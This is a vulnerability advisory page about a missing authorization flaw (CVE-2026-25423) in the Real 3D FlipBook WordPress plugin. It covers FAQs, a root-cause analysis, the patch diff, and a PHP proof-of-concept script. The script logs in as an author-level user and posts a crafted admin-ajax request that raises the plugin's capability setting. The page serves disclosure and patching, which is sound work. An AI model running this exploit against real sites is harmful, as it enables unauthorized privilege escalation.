What is CVE-2026-25423?

CVE-2026-25423 is a medium-severity vulnerability in the Real 3D FlipBook plugin for WordPress, affecting versions up to and including 4.19.1. It is classified as a Missing Authorization flaw, allowing authenticated users with author-level access to perform unauthorized actions.

How does the vulnerability work?

The vulnerability arises from a lack of proper capability checks in the plugin’s administrative settings. Authenticated attackers can exploit this flaw by sending a specially crafted AJAX request to change the plugin’s capability settings, potentially escalating their privileges.

Who is affected by this vulnerability?

Any WordPress site using the Real 3D FlipBook plugin version 4.19.1 or earlier is at risk. Specifically, authenticated users with author-level permissions or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Real 3D FlipBook plugin installed. If it is 4.19.1 or earlier, your site is susceptible to CVE-2026-25423.

How can I fix this vulnerability?

The vulnerability is patched in version 4.19.2 of the Real 3D FlipBook plugin. Updating to this version or later will mitigate the risk associated with CVE-2026-25423.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider temporarily disabling the Real 3D FlipBook plugin to prevent exploitation. Additionally, review user roles and permissions to limit access to authenticated users.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level, suggesting that the vulnerability poses a moderate risk to affected systems. While it does not grant full administrative access, it allows significant control over the plugin’s settings.

What are the practical risks of this vulnerability?

Successful exploitation allows attackers to alter global plugin configurations, which can affect site structure and potentially lock out legitimate administrators. This could lead to unauthorized changes or privilege escalation for other users.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted request to the WordPress AJAX endpoint. It shows the steps to authenticate, obtain a nonce, and execute unauthorized actions.

How can I secure my WordPress site against similar vulnerabilities?

To enhance security, regularly update all plugins and themes, use strong user permissions, and conduct periodic security audits. Additionally, consider implementing security plugins that monitor for unauthorized changes.

Is there a way to monitor for exploitation attempts?

Yes, you can monitor your WordPress site for unusual activity by using security plugins that log user actions, track changes to files, and alert you to suspicious behavior. Regularly reviewing these logs can help identify potential exploitation attempts.

Where can I find more information about this vulnerability?

More detailed information about CVE-2026-25423 can be found in the official CVE database, security advisories from the plugin developers, and security research publications from organizations like Atomic Edge.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-25423: Real 3D FlipBook <= 4.19.1 – Missing Authorization (real3d-flipbook-lite)

CVE ID CVE-2026-25423

Plugin real3d-flipbook-lite

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 4.19.1

Patched Version 4.19.2

Disclosed February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25423:
This vulnerability is a Missing Authorization flaw in the Real 3D FlipBook WordPress plugin versions up to and including 4.19.1. The plugin’s administrative settings page and AJAX handler for saving global settings lacked proper capability checks, allowing authenticated attackers with author-level permissions or higher to modify plugin-wide configuration. This represents a medium-severity privilege escalation issue.

Atomic Edge research identifies the root cause in two specific code locations. In the file real3d-flipbook-lite/includes/Real3DFlipbook.php, the add_submenu_page function at line 833 used a dynamic $capability variable derived from a user-controlled option. This variable defaulted to ‘publish_posts’, which authors possess. In the file real3d-flipbook-lite/includes/plugin-admin.php, the r3d_save_general_callback function at line 33 performed a capability check using the same user-controlled option via get_option(‘real3dflipbook_capability’, ‘publish_posts’). This created a circular dependency where the permission to change the capability setting itself relied on a configurable capability.

Exploitation requires an authenticated attacker with at least Author-level access. The attacker sends a POST request to the WordPress admin-ajax.php endpoint with the action parameter set to r3d_save_general. The request must include a valid nonce obtained from the plugin’s settings page and the manageFlipbooks parameter set to Administrator. This payload triggers the r3d_save_general_callback function, which updates the real3dflipbook_capability option to activate_plugins. After this change, the attacker effectively gains administrative capability over the plugin’s settings and flipbook management functions.

The patch addresses the vulnerability by implementing a fixed, strict capability requirement. The developers replaced the dynamic $capability variable with the hardcoded manage_options string in Real3DFlipbook.php line 833. They also updated the r3d_save_general_callback function in plugin-admin.php line 33, replacing the check for current_user_can($capability) with current_user_can(‘manage_options’). This change ensures only users with WordPress administrative privileges can access the plugin’s settings page and execute the settings-saving AJAX callback, breaking the privilege escalation chain.

Successful exploitation allows an attacker to alter global plugin configuration. This includes changing the URL slug for flipbooks, which triggers rewrite rule flushes and could impact site structure. Attackers can also modify the capability mapping for other roles, potentially locking out legitimate administrators or escalating privileges for other user accounts. While the vulnerability does not grant full WordPress administrative access, it provides control over a significant plugin component and its data.

Differential between vulnerable and patched code

Code Diff

--- a/real3d-flipbook-lite/includes/Real3DFlipbook.php
+++ b/real3d-flipbook-lite/includes/Real3DFlipbook.php
@@ -146,8 +146,6 @@
 	{
 		global $l10n;

-		$capability = get_option('real3dflipbook_capability', 'publish_posts');
-
 		$arg = $this->products['r3d'];
 		$flipbook = $arg['key'];

@@ -783,9 +781,6 @@
 			'dashicons-book'
 		);

-
-
-
 		add_submenu_page(
 			'real3d_flipbook_admin',
 			esc_html__('Flipbooks', 'real3d-flipbook'),
@@ -833,7 +828,7 @@
 			'real3d_flipbook_admin',
 			esc_html__('Settings', 'real3d-flipbook'),
 			esc_html__('Settings', 'real3d-flipbook'),
-			$capability,
+			'manage_options',
 			'real3d_flipbook_settings',
 			array($this, "settings")
 		);
--- a/real3d-flipbook-lite/includes/plugin-admin.php
+++ b/real3d-flipbook-lite/includes/plugin-admin.php
@@ -1,171 +1,169 @@
-<?php
-if (!defined('ABSPATH')) {
-	exit; // Exit if accessed directly
-}
-
-$r3d_globals_settings = get_option("real3dflipbook_global");
-
-if (!$r3d_globals_settings)
-	r3dfb_setDefaults();
-
-function r3dfb_setDefaults()
-{
-	$defaults = r3dfb_getDefaults();
-	delete_option("real3dflipbook_global");
-	add_option("real3dflipbook_global", $defaults);
-}
-
-function r3d_sanitize_array($input)
-{
-	foreach ($input as $key => $value) {
-		if (is_array($value)) {
-			$input[$key] = sanitize_my_options($value);
-		} else {
-			$input[$key] = sanitize_text_field($value);
-			$input[$key] = wp_kses_post($value);
-		}
-	}
-	return $input;
-}
-
-add_action('wp_ajax_r3d_save_general', 'r3d_save_general_callback');
-
-function r3d_save_general_callback()
-{
-
-	check_ajax_referer('r3d_nonce', 'security');
-
-	$capability = get_option('real3dflipbook_capability', 'publish_posts');
-
-	if (!current_user_can($capability)) {
-		wp_die(__('You do not have permission to perform this action.'), 403);
-	}
-
-	unset($_POST['security'], $_POST['action']);
-
-	$data = $_POST;
-
-	if (isset($data['slug']) && (get_option('real3dflipbook_global')['slug'] ?? '') != $data['slug']) {
-		update_option('r3d_flush_rewrite_rules', true);
-	}
-
-	update_option('real3dflipbook_global', $data);
-
-
-
-
-	if (isset($data['manageFlipbooks'])) {
-
-		$role = sanitize_text_field($data['manageFlipbooks']);
-
-		$capability_map = array(
-			'Administrator' => 'activate_plugins',
-			'Editor'        => 'publish_pages',
-			'Author'        => 'publish_posts',
-		);
-
-		$capability = $capability_map[$role] ?? 'publish_posts';
-
-		update_option('real3dflipbook_capability', $capability);
-	}
-
-	wp_die();
-}
-
-add_action('wp_ajax_r3d_reset_general', 'r3d_reset_general_callback');
-
-function r3d_reset_general_callback()
-{
-
-	check_ajax_referer('r3d_nonce', 'security');
-
-	r3dfb_setDefaults();
-
-	wp_die();
-}
-
-add_action('wp_ajax_r3d_save_thumbnail', 'r3dfb_save_thumbnail_callback');
-
-function r3dfb_save_thumbnail_callback()
-{
-	// Security & permission
-	check_ajax_referer('saving-real3d-flipbook', 'security');
-	if (!current_user_can('upload_files')) {
-		wp_send_json_error(['message' => esc_html__('You do not have permission to upload files.', 'real3d-flipbook')]);
-	}
-
-	// Flipbook ID check
-	$id = isset($_POST['id']) ? absint(sanitize_text_field(wp_unslash($_POST['id']))) : 0;
-	if ($id <= 0) {
-		wp_send_json_error(['message' => esc_html__('Invalid flipbook ID.', 'real3d-flipbook')]);
-	}
-
-	$book = get_option('real3dflipbook_' . $id);
-	if (!$book) {
-		wp_send_json_error(['message' => esc_html__('The specified flipbook does not exist.', 'real3d-flipbook')]);
-	}
-
-	// Upload paths
-	$upload_dir = wp_upload_dir();
-	if (!empty($upload_dir['error'])) {
-		wp_send_json_error(['message' => esc_html__('Upload directory error: ', 'real3d-flipbook') . esc_html($upload_dir['error'])]);
-	}
-
-	$book_folder = $upload_dir['basedir'] . "/real3d-flipbook/flipbook_{$id}/";
-	$book_url = $upload_dir['baseurl'] . "/real3d-flipbook/flipbook_{$id}/";
-
-	if ((!file_exists($book_folder) && !mkdir($book_folder, 0755, true)) || !is_writable($book_folder)) {
-		wp_send_json_error(['message' => esc_html(sprintf(__('Cannot write to folder: %s', 'real3d-flipbook'), $book_folder))]);
-	}
-
-	// Validate upload
-	if (empty($_FILES['file']['tmp_name'])) {
-		wp_send_json_error(['message' => esc_html__('No file uploaded.', 'real3d-flipbook')]);
-	}
-
-	// File size (2MB)
-	if ($_FILES['file']['size'] > 2 * 1024 * 1024) {
-		wp_send_json_error(['message' => esc_html__('File size exceeds the maximum limit.', 'real3d-flipbook')]);
-	}
-
-	// Extension & image check
-	$allowed_extensions = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
-	$filename = sanitize_file_name($_FILES['file']['name']);
-	$extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
-	if (!in_array($extension, $allowed_extensions)) {
-		wp_send_json_error(['message' => esc_html__('Invalid file extension.', 'real3d-flipbook')]);
-	}
-	if (getimagesize($_FILES['file']['tmp_name']) === false) {
-		wp_send_json_error(['message' => esc_html__('File is not a valid image.', 'real3d-flipbook')]);
-	}
-
-	// Unique filename
-	$hashed_filename = 'thumbnail_' . time() . '_' . wp_generate_password(4, false, false) . '.' . $extension;
-	$destination = $book_folder . $hashed_filename;
-	$counter = 0;
-	while (file_exists($destination)) {
-		$counter++;
-		$hashed_filename = 'thumbnail_' . time() . '_' . wp_generate_password(4, false, false) . "_{$counter}." . $extension;
-		$destination = $book_folder . $hashed_filename;
-	}
-
-	// Move file
-	if (!move_uploaded_file($_FILES['file']['tmp_name'], $destination)) {
-		wp_send_json_error(['message' => esc_html__('Failed to save the uploaded file.', 'real3d-flipbook')]);
-	}
-	$thumbnail_url = $book_url . $hashed_filename;
-
-	// Remove old thumbnail
-	if (!empty($book['lightboxThumbnailUrl'])) {
-		$old_file = str_replace($upload_dir['baseurl'], $upload_dir['basedir'], $book['lightboxThumbnailUrl']);
-		if (file_exists($old_file)) {
-			@unlink($old_file);
-		}
-	}
-
-	// Save option
-	$book['lightboxThumbnailUrl'] = esc_url($thumbnail_url);
-	update_option('real3dflipbook_' . $id, $book);
-
-	wp_send_json_success(['thumbnail_url' => $thumbnail_url]);
+<?php
+if (!defined('ABSPATH')) {
+	exit; // Exit if accessed directly
+}
+
+$r3d_globals_settings = get_option("real3dflipbook_global");
+
+if (!$r3d_globals_settings)
+	r3dfb_setDefaults();
+
+function r3dfb_setDefaults()
+{
+	$defaults = r3dfb_getDefaults();
+	delete_option("real3dflipbook_global");
+	add_option("real3dflipbook_global", $defaults);
+}
+
+function r3d_sanitize_array($input)
+{
+	foreach ($input as $key => $value) {
+		if (is_array($value)) {
+			$input[$key] = sanitize_my_options($value);
+		} else {
+			$input[$key] = sanitize_text_field($value);
+			$input[$key] = wp_kses_post($value);
+		}
+	}
+	return $input;
+}
+
+add_action('wp_ajax_r3d_save_general', 'r3d_save_general_callback');
+
+function r3d_save_general_callback()
+{
+
+	check_ajax_referer('r3d_nonce', 'security');
+
+	if (!current_user_can('manage_options')) {
+		wp_die(__('You do not have permission to perform this action.'), 403);
+	}
+
+	unset($_POST['security'], $_POST['action']);
+
+	$data = $_POST;
+
+	if (isset($data['slug']) && (get_option('real3dflipbook_global')['slug'] ?? '') != $data['slug']) {
+		update_option('r3d_flush_rewrite_rules', true);
+	}
+
+	update_option('real3dflipbook_global', $data);
+
+
+
+
+	if (isset($data['manageFlipbooks'])) {
+
+		$role = sanitize_text_field($data['manageFlipbooks']);
+
+		$capability_map = array(
+			'Administrator' => 'activate_plugins',
+			'Editor'        => 'publish_pages',
+			'Author'        => 'publish_posts',
+		);
+
+		$capability = $capability_map[$role] ?? 'publish_posts';
+
+		update_option('real3dflipbook_capability', $capability);
+	}
+
+	wp_die();
+}
+
+add_action('wp_ajax_r3d_reset_general', 'r3d_reset_general_callback');
+
+function r3d_reset_general_callback()
+{
+
+	check_ajax_referer('r3d_nonce', 'security');
+
+	r3dfb_setDefaults();
+
+	wp_die();
+}
+
+add_action('wp_ajax_r3d_save_thumbnail', 'r3dfb_save_thumbnail_callback');
+
+function r3dfb_save_thumbnail_callback()
+{
+	// Security & permission
+	check_ajax_referer('saving-real3d-flipbook', 'security');
+	if (!current_user_can('upload_files')) {
+		wp_send_json_error(['message' => esc_html__('You do not have permission to upload files.', 'real3d-flipbook')]);
+	}
+
+	// Flipbook ID check
+	$id = isset($_POST['id']) ? absint(sanitize_text_field(wp_unslash($_POST['id']))) : 0;
+	if ($id <= 0) {
+		wp_send_json_error(['message' => esc_html__('Invalid flipbook ID.', 'real3d-flipbook')]);
+	}
+
+	$book = get_option('real3dflipbook_' . $id);
+	if (!$book) {
+		wp_send_json_error(['message' => esc_html__('The specified flipbook does not exist.', 'real3d-flipbook')]);
+	}
+
+	// Upload paths
+	$upload_dir = wp_upload_dir();
+	if (!empty($upload_dir['error'])) {
+		wp_send_json_error(['message' => esc_html__('Upload directory error: ', 'real3d-flipbook') . esc_html($upload_dir['error'])]);
+	}
+
+	$book_folder = $upload_dir['basedir'] . "/real3d-flipbook/flipbook_{$id}/";
+	$book_url = $upload_dir['baseurl'] . "/real3d-flipbook/flipbook_{$id}/";
+
+	if ((!file_exists($book_folder) && !mkdir($book_folder, 0755, true)) || !is_writable($book_folder)) {
+		wp_send_json_error(['message' => esc_html(sprintf(__('Cannot write to folder: %s', 'real3d-flipbook'), $book_folder))]);
+	}
+
+	// Validate upload
+	if (empty($_FILES['file']['tmp_name'])) {
+		wp_send_json_error(['message' => esc_html__('No file uploaded.', 'real3d-flipbook')]);
+	}
+
+	// File size (2MB)
+	if ($_FILES['file']['size'] > 2 * 1024 * 1024) {
+		wp_send_json_error(['message' => esc_html__('File size exceeds the maximum limit.', 'real3d-flipbook')]);
+	}
+
+	// Extension & image check
+	$allowed_extensions = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
+	$filename = sanitize_file_name($_FILES['file']['name']);
+	$extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
+	if (!in_array($extension, $allowed_extensions)) {
+		wp_send_json_error(['message' => esc_html__('Invalid file extension.', 'real3d-flipbook')]);
+	}
+	if (getimagesize($_FILES['file']['tmp_name']) === false) {
+		wp_send_json_error(['message' => esc_html__('File is not a valid image.', 'real3d-flipbook')]);
+	}
+
+	// Unique filename
+	$hashed_filename = 'thumbnail_' . time() . '_' . wp_generate_password(4, false, false) . '.' . $extension;
+	$destination = $book_folder . $hashed_filename;
+	$counter = 0;
+	while (file_exists($destination)) {
+		$counter++;
+		$hashed_filename = 'thumbnail_' . time() . '_' . wp_generate_password(4, false, false) . "_{$counter}." . $extension;
+		$destination = $book_folder . $hashed_filename;
+	}
+
+	// Move file
+	if (!move_uploaded_file($_FILES['file']['tmp_name'], $destination)) {
+		wp_send_json_error(['message' => esc_html__('Failed to save the uploaded file.', 'real3d-flipbook')]);
+	}
+	$thumbnail_url = $book_url . $hashed_filename;
+
+	// Remove old thumbnail
+	if (!empty($book['lightboxThumbnailUrl'])) {
+		$old_file = str_replace($upload_dir['baseurl'], $upload_dir['basedir'], $book['lightboxThumbnailUrl']);
+		if (file_exists($old_file)) {
+			@unlink($old_file);
+		}
+	}
+
+	// Save option
+	$book['lightboxThumbnailUrl'] = esc_url($thumbnail_url);
+	update_option('real3dflipbook_' . $id, $book);
+
+	wp_send_json_success(['thumbnail_url' => $thumbnail_url]);
 }
 No newline at end of file
--- a/real3d-flipbook-lite/real3d-flipbook-lite.php
+++ b/real3d-flipbook-lite/real3d-flipbook-lite.php
@@ -1,54 +1,54 @@
-<?php
-
-/*
-	Plugin Name: Real3D Flipbook PDF Viewer
-	Plugin URI: https://wordpress.org/plugins/real3d-flipbook-lite/
-	Description: Realistic 3D FlipBook, PDF Viewer, PDF Embedder - create realistic 3D flipbook from PDF or images.
-	Version: 4.19.1
-	Author: creativeinteractivemedia
-	Author URI: http://codecanyon.net/user/creativeinteractivemedia
-	License: GPLv2 or later
-	License URI: https://www.gnu.org/licenses/gpl-2.0.html
-	Text Domain: real3d-flipbook
-	Domain Path: /languages
-	*/
-
-if (!function_exists('r3d_fs')) {
-	// Create a helper function for easy SDK access.
-	function r3d_fs()
-	{
-		global $r3d_fs;
-
-		if (!isset($r3d_fs)) {
-			// Include Freemius SDK.
-			require_once dirname(__FILE__) . '/freemius/start.php';
-
-			$r3d_fs = fs_dynamic_init(array(
-				'id'                  => '13754',
-				'slug'                => 'real3d-flipbook-lite',
-				'type'                => 'plugin',
-				'public_key'          => 'pk_ac0809f567e096fcd1cce6f0e3af1',
-				'is_premium'          => false,
-				'has_addons'          => false,
-				'has_paid_plans'      => false,
-				'menu'                => array(
-					'slug'           => 'edit.php?post_type=r3d',
-					'account'        => false,
-					'first-path' => 'admin.php?page=real3d_flipbook_help'
-				),
-			));
-		}
-
-		return $r3d_fs;
-	}
-
-	// Init Freemius.
-	r3d_fs();
-	// Signal that SDK was initiated.
-	do_action('r3d_fs_loaded');
-}
-
-define('REAL3D_FLIPBOOK_VERSION', '4.19.1');
-define('REAL3D_FLIPBOOK_FILE', __FILE__);
-
+<?php
+
+/*
+	Plugin Name: Real3D Flipbook PDF Viewer
+	Plugin URI: https://wordpress.org/plugins/real3d-flipbook-lite/
+	Description: Realistic 3D FlipBook, PDF Viewer, PDF Embedder - create realistic 3D flipbook from PDF or images.
+	Version: 4.19.2
+	Author: creativeinteractivemedia
+	Author URI: http://codecanyon.net/user/creativeinteractivemedia
+	License: GPLv2 or later
+	License URI: https://www.gnu.org/licenses/gpl-2.0.html
+	Text Domain: real3d-flipbook
+	Domain Path: /languages
+	*/
+
+if (!function_exists('r3d_fs')) {
+	// Create a helper function for easy SDK access.
+	function r3d_fs()
+	{
+		global $r3d_fs;
+
+		if (!isset($r3d_fs)) {
+			// Include Freemius SDK.
+			require_once dirname(__FILE__) . '/freemius/start.php';
+
+			$r3d_fs = fs_dynamic_init(array(
+				'id'                  => '13754',
+				'slug'                => 'real3d-flipbook-lite',
+				'type'                => 'plugin',
+				'public_key'          => 'pk_ac0809f567e096fcd1cce6f0e3af1',
+				'is_premium'          => false,
+				'has_addons'          => false,
+				'has_paid_plans'      => false,
+				'menu'                => array(
+					'slug'           => 'edit.php?post_type=r3d',
+					'account'        => false,
+					'first-path' => 'admin.php?page=real3d_flipbook_help'
+				),
+			));
+		}
+
+		return $r3d_fs;
+	}
+
+	// Init Freemius.
+	r3d_fs();
+	// Signal that SDK was initiated.
+	do_action('r3d_fs_loaded');
+}
+
+define('REAL3D_FLIPBOOK_VERSION', '4.19.2');
+define('REAL3D_FLIPBOOK_FILE', __FILE__);
+
 include_once(plugin_dir_path(__FILE__) . '/includes/Real3DFlipbook.php');
 No newline at end of file

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25423 - Real 3D FlipBook <= 4.19.1 - Missing Authorization

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'author_user';
$password = 'author_password';

// Step 1: Authenticate to WordPress and obtain cookies/nonce
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true
]);
$response = curl_exec($ch);

// Step 2: Access the plugin's settings page to extract the nonce
// The nonce is required for the AJAX request
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin.php?page=real3d_flipbook_settings',
    CURLOPT_POST => false
]);
$response = curl_exec($ch);

// Extract nonce from page (simplified - in reality would parse HTML)
// The nonce is typically in a script or hidden field with name 'security' or 'r3d_nonce'
// For this PoC, we assume the attacker has obtained the nonce value
$nonce = 'EXTRACTED_NONCE_VALUE';

// Step 3: Exploit the missing authorization to escalate plugin capabilities
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'r3d_save_general',
        'security' => $nonce,
        'manageFlipbooks' => 'Administrator'
        // Additional global settings parameters can be included here
    ])
]);
$ajax_response = curl_exec($ch);

if ($ajax_response === '0' || $ajax_response === '') {
    echo "Exploit successful. Plugin capability changed to 'activate_plugins'.n";
    echo "Author-level user now has administrative control over Real 3D FlipBook settings.n";
} else {
    echo "Exploit failed. Response: " . htmlspecialchars($ajax_response) . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-25423?
Overview of the vulnerability
CVE-2026-25423 is a medium-severity vulnerability in the Real 3D FlipBook plugin for WordPress, affecting versions up to and including 4.19.1. It is classified as a Missing Authorization flaw, allowing authenticated users with author-level access to perform unauthorized actions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of proper capability checks in the plugin’s administrative settings. Authenticated attackers can exploit this flaw by sending a specially crafted AJAX request to change the plugin’s capability settings, potentially escalating their privileges.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Real 3D FlipBook plugin version 4.19.1 or earlier is at risk. Specifically, authenticated users with author-level permissions or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check if your site is vulnerable, verify the version of the Real 3D FlipBook plugin installed. If it is 4.19.1 or earlier, your site is susceptible to CVE-2026-25423.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 4.19.2 of the Real 3D FlipBook plugin. Updating to this version or later will mitigate the risk associated with CVE-2026-25423.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider temporarily disabling the Real 3D FlipBook plugin to prevent exploitation. Additionally, review user roles and permissions to limit access to authenticated users.
What does the CVSS score of 4.3 indicate?
Understanding severity levels
A CVSS score of 4.3 indicates a medium severity level, suggesting that the vulnerability poses a moderate risk to affected systems. While it does not grant full administrative access, it allows significant control over the plugin’s settings.
What are the practical risks of this vulnerability?
Potential impacts on site security
Successful exploitation allows attackers to alter global plugin configurations, which can affect site structure and potentially lock out legitimate administrators. This could lead to unauthorized changes or privilege escalation for other users.
What does the proof of concept demonstrate?
Example of exploitation
The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted request to the WordPress AJAX endpoint. It shows the steps to authenticate, obtain a nonce, and execute unauthorized actions.
How can I secure my WordPress site against similar vulnerabilities?
Best practices for WordPress security
To enhance security, regularly update all plugins and themes, use strong user permissions, and conduct periodic security audits. Additionally, consider implementing security plugins that monitor for unauthorized changes.
Is there a way to monitor for exploitation attempts?
Detecting unauthorized access
Yes, you can monitor your WordPress site for unusual activity by using security plugins that log user actions, track changes to files, and alert you to suspicious behavior. Regularly reviewing these logs can help identify potential exploitation attempts.
Where can I find more information about this vulnerability?
Resources for further reading
More detailed information about CVE-2026-25423 can be found in the official CVE database, security advisories from the plugin developers, and security research publications from organizations like Atomic Edge.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations